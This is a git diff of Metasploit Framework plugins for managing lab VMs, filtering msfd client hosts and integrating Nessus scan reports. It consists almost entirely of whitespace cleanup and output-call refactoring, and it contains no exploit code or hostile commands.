- end
- end
- end
end
end
-
- def cmd_lab_stop(*args)
+
+ def cmd_lab_show_running(*args)
+ hlp_print_lab_running
+ end
+
+ def cmd_lab_start(*args)
return lab_usage if args.empty?
-
+
if args[0] == "all"
- @controller.each do |vm|
- print_line "Stopping lab vm #{vm.vmid}."
- if vm.running?
- vm.stop
+ @controller.each do |vm|
+ print_line "Starting lab vm #{vm.vmid}."
+ if !vm.running?
+ vm.start
else
- print_line "Lab vm #{vm.vmid} not running."
+ print_line "Lab vm #{vm.vmid} already running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
- vm = @controller.find_by_vmid(arg)
- if vm.running?
- print_line "Stopping lab vm #{vm.vmid}."
- vm.stop
+ vm = @controller.find_by_vmid(arg)
+ if !vm.running?
+ print_line "Starting lab vm #{vm.vmid}."
+ vm.start
else
- print_line "Lab vm #{vm.vmid} not running."
+ print_line "Lab vm #{vm.vmid} already running."
end
- end
+ end
end
end
- end
+ end
+
+ def cmd_lab_stop(*args)
+ return lab_usage if args.empty?
+
+ if args[0] == "all"
+ @controller.each do |vm|
+ print_line "Stopping lab vm #{vm.vmid}."
+ if vm.running?
+ vm.stop
+ else
+ print_line "Lab vm #{vm.vmid} not running."
+ end
+ end
+ else
+ args.each do |arg|
+ if @controller.includes_vmid? arg
+ vm = @controller.find_by_vmid(arg)
+ if vm.running?
+ print_line "Stopping lab vm #{vm.vmid}."
+ vm.stop
+ else
+ print_line "Lab vm #{vm.vmid} not running."
+ end
+ end
+ end
+ end
+ end
def cmd_lab_suspend(*args)
return lab_usage if args.empty?
-
+
if args[0] == "all"
@controller.each{ |vm| vm.suspend }
else
@@ -186,15 +187,15 @@ class Plugin::Lab < Msf::Plugin
if @controller.find_by_vmid(arg).running?
print_line "Suspending lab vm #{arg}."
@controller.find_by_vmid(arg).suspend
- end
- end
+ end
+ end
end
end
- end
+ end
def cmd_lab_reset(*args)
return lab_usage if args.empty?
-
+
if args[0] == "all"
print_line "Resetting all lab vms."
@controller.each{ |vm| vm.reset }
@@ -203,18 +204,18 @@ class Plugin::Lab < Msf::Plugin
if @controller.includes_vmid? arg
if @controller.find_by_vmid(arg).running?
print_line "Resetting lab vm #{arg}."
- @controller.find_by_vmid(arg).reset
+ @controller.find_by_vmid(arg).reset
end
- end
+ end
end
end
- end
+ end
def cmd_lab_snapshot(*args)
return lab_usage if args.count < 2
- snapshot = args[args.count-1]
-
+ snapshot = args[args.count-1]
+
if args[0] == "all"
print_line "Snapshotting all lab vms to snapshot: #{snapshot}."
@controller.each{ |vm| vm.create_snapshot(snapshot) }
@@ -225,12 +226,12 @@ class Plugin::Lab < Msf::Plugin
@controller[vmid_arg].create_snapshot(snapshot)
end
end
- end
+ end
def cmd_lab_revert(*args)
return lab_usage if args.count < 2
- snapshot = args[args.count-1]
+ snapshot = args[args.count-1]
if args[0] == "all"
print_line "Reverting all lab vms to snapshot: #{snapshot}."
@@ -239,10 +240,10 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
print_line "Reverting #{vmid_arg} to snapshot: #{snapshot}."
- @controller[vmid_arg].revert_snapshot(snapshot)
+ @controller[vmid_arg].revert_snapshot(snapshot)
end
end
- end
+ end
def cmd_lab_run_command(*args)
@@ -250,7 +251,7 @@ class Plugin::Lab < Msf::Plugin
command = args[args.count-1]
if args[0] == "all"
print_line "Running command #{command} on all vms."
- @controller.each do |vm|
+ @controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} running command: #{command}."
vm.run_command(command)
@@ -260,19 +261,19 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
if @controller[vmid_arg].running?
- print_line "#{vmid_arg} running command: #{command}."
+ print_line "#{vmid_arg} running command: #{command}."
@controller[vmid_arg].run_command(command)
end
end
end
- end
+ end
def cmd_lab_browse_to(*args)
return lab_usage if args.empty?
uri = args[args.count-1]
if args[0] == "all"
print_line "Opening: #{uri} on all vms."
- @controller.each do |vm|
+ @controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} opening to uri: #{uri}."
vm.open_uri(uri)
@@ -288,12 +289,12 @@ class Plugin::Lab < Msf::Plugin
end
end
end
-
+
##
## Commands for help
##
-
+
def longest_cmd_size
commands.keys.map {|x| x.size}.sort.last
end
@@ -332,9 +333,9 @@ class Plugin::Lab < Msf::Plugin
end
end
- print_line
+ print_line
print_line "In order to use this plugin, you'll want to configure a .yml lab file"
- print_line "You can find an example in data/lab/test_targets.yml"
+ print_line "You can find an example in data/lab/test_targets.yml"
print_line
end
@@ -349,18 +350,18 @@ class Plugin::Lab < Msf::Plugin
'Columns' => [ 'Vmid', 'Name', 'Location', "Power?" ]
)
- @controller.each do |vm|
+ @controller.each do |vm|
tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
end
-
+
print_line tbl.to_s
end
-
+
def hlp_print_lab_running
- indent = ' '
+ indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Running Lab VMs',
@@ -369,19 +370,19 @@ class Plugin::Lab < Msf::Plugin
)
@controller.each do |vm|
- if vm.running?
- tbl << [ vm.vmid,
+ if vm.running?
+ tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
- end
+ end
end
print_line tbl.to_s
end
end
-
+
#
# The constructor is called when an instance of the plugin is created. The
# framework instance that the plugin is being associated with is passed in
@@ -427,6 +428,6 @@ class Plugin::Lab < Msf::Plugin
def desc
"Adds the ability to manage VMs"
end
-
+
end ## End Class
end ## End Module
diff --git a/plugins/msfd.rb b/plugins/msfd.rb
index 3eadba8cdc..98b13ce1c5 100644
--- a/plugins/msfd.rb
+++ b/plugins/msfd.rb
@@ -104,13 +104,13 @@ class Plugin::Msfd < Msf::Plugin
addr = Rex::Socket.resolv_nbo(client.peerhost)
if opts['HostsAllowed'] and
- not opts['HostsAllowed'].find { |x| x == addr }
+ not opts['HostsAllowed'].find { |x| x == addr }
client.close
next
end
if opts['HostsDenied'] and
- opts['HostsDenied'].find { |x| x == addr }
+ opts['HostsDenied'].find { |x| x == addr }
client.close
next
end
diff --git a/plugins/nessus.rb b/plugins/nessus.rb
index 62cf968746..a5a8d1cf2f 100644
--- a/plugins/nessus.rb
+++ b/plugins/nessus.rb
@@ -1,16 +1,18 @@
+# $Id$
+# $Revision$
require 'nessus/nessus-xmlrpc'
require 'rex/parser/nessus_xml'
module Msf
-
+
#constants
NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf
Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits.
Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds
-
+
class Plugin::Nessus < Msf::Plugin
-
+
#creates the index of exploit details to make searching for exploits much faster.
def create_xindex
start = Time.now
@@ -19,50 +21,50 @@ module Msf
count = 0
# use Msf::Config.get_config_root as the location.
File.open("#{Xindex}", "w+") do |f|
- #need to add version line.
- f.puts(Msf::Framework::RepoRevision)
- framework.exploits.sort.each { |refname, mod|
- case count
- when 0
- print("\b\b\b[|]")
- count += 1
- when 1
- print("\b\b\b[/]")
- count += 1
- when 2
- print("\b\b\b[-]")
- count += 1
- when 3
- print("\b\b\b[\\]")
- count =0
- end
- stuff = ""
- o = nil
- begin
- o = mod.new
- rescue ::Exception
- end
- stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
- next if not o
- o.references.map do |x|
- if !(x.ctx_id == "URL")
- if (x.ctx_id == "MSB")
- stuff << "|#{x.ctx_val}"
- else
- stuff << "|#{x.ctx_id}-#{x.ctx_val}"
+ #need to add version line.
+ f.puts(Msf::Framework::RepoRevision)
+ framework.exploits.sort.each { |refname, mod|
+ case count
+ when 0
+ print("\b\b\b[|]")
+ count += 1
+ when 1
+ print("\b\b\b[/]")
+ count += 1
+ when 2
+ print("\b\b\b[-]")
+ count += 1
+ when 3
+ print("\b\b\b[\\]")
+ count =0
+ end
+ stuff = ""
+ o = nil
+ begin
+ o = mod.new
+ rescue ::Exception
+ end
+ stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
+ next if not o
+ o.references.map do |x|
+ if !(x.ctx_id == "URL")
+ if (x.ctx_id == "MSB")
+ stuff << "|#{x.ctx_val}"
+ else
+ stuff << "|#{x.ctx_id}-#{x.ctx_val}"
+ end
end
end
- end
- stuff << "\n"
- f.puts(stuff)
- }
+ stuff << "\n"
+ f.puts(stuff)
+ }
end
total = Time.now - start
print("\b\b\b[*]%clr")
print("\n")
print_status("It has taken : #{total} seconds to build the exploits search index")
end
-
+
def nessus_index
if File.exist?("#{Xindex}")
#check if it's version line matches current version.
@@ -79,7 +81,7 @@ module Msf
create_xindex
end
end
-
+
class ConsoleCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
def name
@@ -126,11 +128,11 @@ module Msf
"nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit."
}
end
-
+
def cmd_nessus_index
Msf::Plugin::Nessus.nessus_index
end
-
+
def cmd_nessus_save(*args)
#if we are logged in, save session details to nessus.yaml
if args[0] == "-h"
@@ -138,15 +140,15 @@ module Msf
print_status(" nessus_save")
return
end
-
+
if args[0]
print_status("Usage: ")
print_status(" nessus_save")
return
end
-
+
group = "default"
-
+
if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
config = Hash.new
config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}}
@@ -154,15 +156,15 @@ module Msf
f.puts YAML.dump(config)
end
print_good("#{Nessus_yaml} created.")
-
+
else
print_error("Missing username/password/server/port - relogin and then try again.")
return
end
end
-
+
def cmd_nessus_report_exploits(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_summary ")
@@ -172,20 +174,20 @@ module Msf
print_status("%redThis plugin is experimental%clr")
return
end
-
+
if ! nessus_verify_db
print_error("You need a database configured for this command.")
print_error("Connect to a db with \"db_connect\"")
print_error("Then import scan with nessus_report_get")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
rid = nil
-
+
case args.length
when 1
rid = args[0]
@@ -195,12 +197,12 @@ module Msf
print_status("Parses your report and just shows you exploitable vulns.")
return
end
-
+
if check_scan(rid)
print_error("That scan is still running.")
return
end
-
+
#streaming parser ftw.
content = nil
content=@n.report_file_download(rid)
@@ -215,20 +217,20 @@ module Msf
parser.on_found_host = Proc.new { |host|
addr = host['addr'] || host['hname']
addr.gsub!(/[\n\r]/," or ") if addr
-
+
os = host['os']
os.gsub!(/[\n\r]/," or ") if os
-
+
hname = host['hname']
hname.gsub!(/[\n\r]/," or ") if hname
-
+
mac = host['mac']
mac.gsub!(/[\n\r]/," or ") if mac
-
+
host['ports'].each do |item|
-
+
next if item['port'] == 0
-
+
exp = []
msf = nil
nasl = item['nasl'].to_s
@@ -237,21 +239,21 @@ module Msf
name = item['svc_name']
severity = item['severity']
description = item['description']
- cve = item['cve']
+ cve = item['cve']
bid = item['bid']
xref = item['xref']
msf = item['msf']
-
+
# find exploits based on the msf plugin name from the report output.
if msf
regex = Regexp.new(msf, true, 'n')
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
-
+
# find exploits based on CVE
if cve
cve.each do |c|
@@ -259,11 +261,11 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
end
-
+
#find exploits based on BID
if bid
bid.each do |c|
@@ -273,13 +275,13 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
end
-
+
#find exploits based on OSVDB entry
-
+
#find exploits based on MSB
if xref
xref.each do |c|
@@ -289,12 +291,12 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
end
end
-
+
nss = 'NSS-' + nasl
next if exp.empty?
print("#{addr} | #{os} | #{port} | #{nss} | Sev #{severity} | %bld%red#{exp.uniq}%clr\n")
@@ -313,11 +315,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 2
pid = args[0].to_i
@@ -328,30 +330,30 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
-
+
if check_policy(pid)
print_error("That policy does not exist.")
return
end
-
+
tgts = ""
framework.db.hosts(framework.db.workspace).each do |host|
tgts << host.address
tgts << ","
end
-
+
tgts.chop!
-
+
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning all hosts in workspace")
-
+
scan = @n.scan_new(pid, name, tgts)
-
+
if scan
print_status("Scan started. uid is #{scan}")
end
-
+
end
-
+
def cmd_nessus_logout
@token = nil
print_status("Logged out")
@@ -359,14 +361,14 @@ module Msf
print_good("#{Nessus_yaml} removed.")
return
end
-
+
def cmd_nessus_help(*args)
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Command',
'Help Text'
- ])
+ ]
+ )
tbl << [ "Generic Commands", "" ]
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_connect", "Connect to a nessus server" ]
@@ -415,12 +417,13 @@ module Msf
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_policy_list", "List all polciies" ]
tbl << [ "nessus_policy_del", "Delete a policy" ]
- puts "\n"
- puts tbl.to_s + "\n"
+ print_status ""
+ print_status tbl.to_s
+ print_status ""
end
-
+
def cmd_nessus_server_feed(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_feed")
@@ -429,23 +432,22 @@ module Msf
print_status("Returns information about the feed type and server version.")
return
end
-
+
if nessus_verify_token
@feed, @version, @web_version = @n.feed
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Feed',
'Nessus Version',
'Nessus Web Version'
])
tbl << [@feed, @version, @web_version]
print_good("Nessus Status")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
end
-
+
def nessus_verify_token
if @token.nil? or @token == ''
ncusage
@@ -453,16 +455,16 @@ module Msf
end
true
end
-
+
def nessus_verify_db
-
+
if ! (framework.db and framework.db.active)
print_error("No database has been configured, please use db_create/db_connect first")
return false
end
true
end
-
+
def ncusage
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -480,9 +482,9 @@ module Msf
print_status("This only works after you have saved creds with nessus_save")
return
end
-
+
def cmd_nessus_connect(*args)
-
+
if ! args[0]
if File.exist?("#{Nessus_yaml}")
lconfig = YAML.load_file("#{Nessus_yaml}")
@@ -497,7 +499,7 @@ module Msf
return
end
end
-
+
if args[0] == "-h"
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -521,19 +523,19 @@ module Msf
print_status("know that nessus used a self signed cert and the risk that presents.")
return
end
-
+
if ! @token == ''
print_error("You are already authenticated. Call nessus_logout before authing again")
return
end
-
+
if(args.length == 0 or args[0].empty?)
ncusage
return
end
-
+
@user = @pass = @host = @port = @sslv = nil
-
+
case args.length
when 1,2
if args[0].include? "@"
@@ -548,7 +550,7 @@ module Msf
@port ||= '8834'
@sslv = args[1]
end
-
+
when 3,4,5
ncusage
return
@@ -556,12 +558,12 @@ module Msf
ncusage
return
end
-
+
if /\/\//.match(@host)
ncusage
return
end
-
+
if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok")
print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker")
print_error(" with the ability to man-in-the-middle the Nessus traffic to capture the Nessus")
@@ -569,36 +571,34 @@ module Msf
print_error(" as an additional parameter to this command.")
return
end
-
+
if ! @user
print_good("Username:")
- $stdout.flush
@user = gets
@user.chomp!
end
-
+
if ! @pass
print_good("Password:")
- $stdout.flush
@pass = gets
@pass.chomp!
end
-
+
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
ncusage
return
end
nessus_login
end
-
+
def nessus_login
-
+
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
print_status("You need to connect to a server first.")
ncusage
return
end
-
+
@url = "https://#{@host}:#{@port}/"
print_status("Connecting to #{@url} as #{@user}")
@n=NessusXMLRPC::NessusXMLRPC.new(@url,@user,@pass)
@@ -610,9 +610,9 @@ module Msf
return
end
end
-
+
def cmd_nessus_report_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_list")
@@ -621,35 +621,34 @@ module Msf
print_status("Generates a list of all reports visable to your user.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
list=@n.report_list_hash
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'ID',
'Name',
'Status',
'Date'
])
-
+
list.each {|report|
t = Time.at(report['timestamp'].to_i)
tbl << [ report['id'], report['name'], report['status'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus Report List")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get a list of hosts from the report: nessus_report_hosts ")
end
-
+
def check_scan(*args)
-
+
case args.length
when 1
rid = args[0]
@@ -657,7 +656,7 @@ module Msf
print_error("No Report ID Supplied")
return
end
-
+
scans = @n.scan_list_hash
scans.each {|scan|
if scan['id'] == rid
@@ -666,9 +665,9 @@ module Msf
}
return false
end
-
+
def cmd_nessus_report_get(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_get ")
@@ -680,24 +679,24 @@ module Msf
print_status("Use: nessus_report_list to obtain a list of report id's")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! nessus_verify_db
return
end
-
+
if(args.length == 0 or args[0].empty? or args[0] == "-h")
print_status("Usage: ")
print_status(" nessus_report_get ")
print_status(" use nessus_report_list to list all available reports for importing")
return
end
-
+
rid = nil
-
+
case args.length
when 1
rid = args[0]
@@ -707,7 +706,7 @@ module Msf
print_status(" use nessus_report_list to list all available reports for importing")
return
end
-
+
if check_scan(rid)
print_error("That scan is still running.")
return
@@ -720,41 +719,38 @@ module Msf
end
print_status("importing " + rid)
framework.db.import({:data => content}) do |type,data|
- case type
+ case type
when :address
@count = 0
- print("%bld%blu[*]%clr %bld#{data}%clr")
- $stdout.flush
+ print_line("%bld%blu[*]%clr %bld#{data}%clr")
when :port
- print("\b")
+ print_line("\b")
case @count
when 0
- print("%bld%grn|")
+ print_line("%bld%grn|")
@count += 1
when 1
- print("%bld%grn/")
+ print_line("%bld%grn/")
@count += 1
when 2
- print("%bld%grn-")
+ print_line("%bld%grn-")
@count += 1
when 3
- print("%bld%grn/")
+ print_line("%bld%grn/")
@count = 0
end
- $stdout.flush
when :end
- print("\b Done!%clr\n")
- $stdout.flush
- when :os
+ print_line("\b Done!%clr\n")
+ when :os
data.gsub!(/[\n\r]/," or ") if data
- print(" #{data} ")
- end
+ print_line(" #{data} ")
+ end
end
print_good("Done")
end
-
+
def cmd_nessus_scan_status(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_status")
@@ -763,11 +759,11 @@ module Msf
print_status("Returns a list of information about currently running scans.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
list=@n.scan_list_hash
if list.empty?
print_status("No Scans Running.")
@@ -776,10 +772,9 @@ module Msf
print_status(" Create a scan: nessus_scan_new ")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Scan ID',
'Name',
'Owner',
@@ -788,22 +783,22 @@ module Msf
'Current Hosts',
'Total Hosts'
])
-
+
list.each {|scan|
t = Time.at(scan['start'].to_i)
tbl << [ scan['id'], scan['name'], scan['owner'], t.strftime("%H:%M %b %d %Y"), scan['status'], scan['current'], scan['total'] ]
}
print_good("Running Scans")
- puts "\n"
- puts tbl.to_s + "\n"
- puts "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
+ print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get ")
print_good(" Pause a nessus scan : nessus_scan_pause ")
end
-
+
def cmd_nessus_template_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_template_list")
@@ -812,13 +807,13 @@ module Msf
print_status("Returns a list of information about the server templates..")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
list=@n.template_list_hash
-
+
if list.empty?
print_status("No Templates Created.")
print_status("You can:")
@@ -826,30 +821,29 @@ module Msf
print_status(" Create a template: nessus_template_new ")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Template ID',
'Policy ID',
'Name',
'Owner',
'Target'
])
-
+
list.each {|template|
tbl << [ template['name'], template['pid'], template['rname'], template['owner'], template['target'] ]
}
print_good("Templates")
- puts "\n"
- puts tbl.to_s + "\n"
- puts "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
+ print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get ")
end
-
+
def cmd_nessus_user_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_list")
@@ -858,36 +852,35 @@ module Msf
print_status("Returns a list of the users on the Nessus server and their access level.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_status("Your Nessus user is not an admin")
end
-
+
list=@n.users_list
print_good("There are #{list.length} users")
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Name',
'Is Admin?',
'Last Login'
])
-
+
list.each {|user|
t = Time.at(user['lastlogin'].to_i)
tbl << [ user['name'], user['admin'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus users")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_server_status(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_status")
@@ -900,19 +893,18 @@ module Msf
if ! nessus_verify_token
return
end
-
+
#Check if we are an admin
if ! @n.is_admin
print_status("You need to be an admin for this.")
return
end
-
+
#Versions
cmd_nessus_server_feed
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Users',
'Policies',
'Running Scans',
@@ -922,19 +914,19 @@ module Msf
#Count how many users the server has.
list=@n.users_list
users = list.length
-
+
#Count how many policies
list=@n.policy_list_hash
policies = list.length
-
+
#Count how many running scans
list=@n.scan_list_uids
scans = list.length
-
+
#Count how many reports are available
list=@n.report_list_hash
reports = list.length
-
+
#Count how many plugins
list=@n.plugins_list
total = Array.new
@@ -943,12 +935,12 @@ module Msf
}
plugins = total.sum
tbl << [users, policies, scans, reports, plugins]
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_plugin_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_list")
@@ -957,14 +949,13 @@ module Msf
print_status("Returns a list of the plugins on the server per family.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Family Name',
'Total Plugins'
])
@@ -978,13 +969,13 @@ module Msf
tbl << [ '', '']
tbl << [ 'Total Plugins', plugins ]
print_good("Plugins By Family")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("List plugins for a family : nessus_plugin_family ")
end
-
+
def check_policy(*args)
-
+
case args.length
when 1
pid = args[0]
@@ -992,7 +983,7 @@ module Msf
print_error("No Policy ID supplied.")
return
end
-
+
pol = @n.policy_list_hash
pol.each {|p|
if p['id'].to_i == pid
@@ -1001,9 +992,9 @@ module Msf
}
return true
end
-
+
def cmd_nessus_scan_new(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_new ")
@@ -1013,11 +1004,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 3
pid = args[0].to_i
@@ -1029,23 +1020,23 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
-
+
if check_policy(pid)
print_error("That policy does not exist.")
return
end
-
+
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning #{tgts}")
-
+
scan = @n.scan_new(pid, name, tgts)
-
+
if scan
print_status("Scan started. uid is #{scan}")
end
end
-
+
def cmd_nessus_scan_pause(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause ")
@@ -1055,11 +1046,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
sid = args[0]
@@ -1069,14 +1060,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
-
+
pause = @n.scan_pause(sid)
-
+
print_status("#{sid} has been paused")
end
-
+
def cmd_nessus_scan_resume(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume ")
@@ -1086,11 +1077,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
sid = args[0]
@@ -1100,14 +1091,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
-
+
resume = @n.scan_resume(sid)
-
+
print_status("#{sid} has been resumed")
end
-
+
def cmd_nessus_report_hosts(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_hosts ")
@@ -1117,11 +1108,11 @@ module Msf
print_status("use nessus_report_list to list all available scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
rid = args[0]
@@ -1131,10 +1122,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Hostname',
'Severity',
'Sev 0',
@@ -1149,14 +1139,14 @@ module Msf
tbl << [ host['hostname'], host['severity'], host['sev0'], host['sev1'], host['sev2'], host['sev3'], host['current'], host['total'] ]
}
print_good("Report Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get information from a particular host: nessus_report_host_ports ")
end
-
+
def cmd_nessus_report_host_ports(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_ports ")
@@ -1165,11 +1155,11 @@ module Msf
print_status("Returns all the ports associated with a host and details about their vulnerabilities")
print_status("use nessus_report_hosts to list all available hosts for a report")
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 2
host = args[0]
@@ -1180,10 +1170,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Port',
'Protocol',
'Severity',
@@ -1198,14 +1187,14 @@ module Msf
tbl << [ port['portnum'], port['protocol'], port['severity'], port['svcname'], port['sev0'], port['sev1'], port['sev2'], port['sev3'] ]
}
print_good("Host Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail ")
end
-
+
def cmd_nessus_report_host_detail(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_detail ")
@@ -1215,11 +1204,11 @@ module Msf
print_status("use nessus_report_host_ports to list all available ports for a host")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 4
host = args[0]
@@ -1232,10 +1221,9 @@ module Msf
print_status(" use nessus_report_host_ports to list all available ports")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Port',
'Severity',
'PluginID',
@@ -1248,15 +1236,25 @@ module Msf
])
details=@n.report_host_port_details(rid, host, port, prot)
details.each {|detail|
- tbl << [ detail['port'], detail['severity'], detail['pluginID'], detail['pluginName'], detail['cvss_base_score'] || 'none', detail['exploit_available'] || '.', detail['cve'] || '.', detail['risk_factor'] || '.', detail['cvss_vector'] || '.' ]
+ tbl << [
+ detail['port'],
+ detail['severity'],
+ detail['pluginID'],
+ detail['pluginName'],
+ detail['cvss_base_score'] || 'none',
+ detail['exploit_available'] || '.',
+ detail['cve'] || '.',
+ detail['risk_factor'] || '.',
+ detail['cvss_vector'] || '.'
+ ]
}
print_good("Port Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_scan_pause_all(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause_all")
@@ -1266,18 +1264,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
pause = @n.scan_pause_all
-
+
print_status("All scans have been paused")
end
-
+
def cmd_nessus_scan_stop(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop ")
@@ -1287,11 +1285,11 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
sid = args[0]
@@ -1301,14 +1299,14 @@ module Msf
